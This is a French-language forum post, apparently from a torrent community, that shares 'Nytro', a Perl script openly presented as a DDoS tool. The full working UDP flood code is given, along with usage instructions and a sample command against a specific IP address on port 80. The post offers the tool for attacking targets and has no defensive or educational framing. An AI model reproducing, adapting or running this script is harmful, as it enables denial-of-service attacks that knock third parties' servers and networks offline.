Torrents Stats
- Partagées
- 130 Go
- Téléchargées
- 0 bytes
- Ratio
- -
- Messages
- 991
- J'aime
- 168
- Trophées
- 999
- Inscrit
- 14 Décembre 2015
Nytro est un script en Perl qui permet de DDoS.
Script :
Code:
#!/usr/bin/perl
##
# WM|T Team
##
use Socket;
use strict;
my ($ip,$port,$size,$time) = @ARGV;
my ($iaddr,$endtime,$psize,$pport);
$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 100);
socket(flood, PF_INET, SOCK_DGRAM, 17);
use Term::ANSIColor;
print color 'green';
print <<EOTEXT;
____________________________________________________
/ \
| _____________________________________________ |
| | | |
| | C:\> _ | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| |_____________________________________________| |
| |
\_____________________________________________________/
\_______________________________________/
_______________________________________________
_-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
_-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
_-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
_-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
_-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'
ooooooooo
888 88o ooooooo oooo o oooo oo oooooo
888 888 888 888 888 888 888 888 888
888 888 888 888 888888888 888 888
o888ooo88 88ooo88 88 88 o888o o888o
~Your Target: $ip Down In a few Second !
~The Victim Down for $time Second !
~You using this port ($port)
~The size is ($size)
EOTEXT
use Term::ANSIColor;
print color 'cyan';
print "IP CIBLE: $ip " . "SUR LE PORT: " . ($port ? $port : "random") . "
PUISSANCE D'ATTAQUE: " .
($size ? "$size BYTE(S)" : "PUISSANCE MAX DU VPS !") . "
" .
($time ? " POUR $time SECONDE(S)" : "") . "\n";
print "STOPPER L'ATTAQUE: CTRL + C" unless $time;
for (;time() <= $endtime;) {
$psize = $size ? $size : int(rand(1500000-64)+64) ;
$pport = $port ? $port : int(rand(1500000))+1;
send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport,
$iaddr));}
Code:
perl nytro.pl IP PORT(53 jusqu'a 80) Puissance Temps
Exemple : perl nytro.pl 85.35.6.74 80 4000 100
Source :
http://i.imgur.com/wQr8y2y.png
Source :
lien ou image supprimée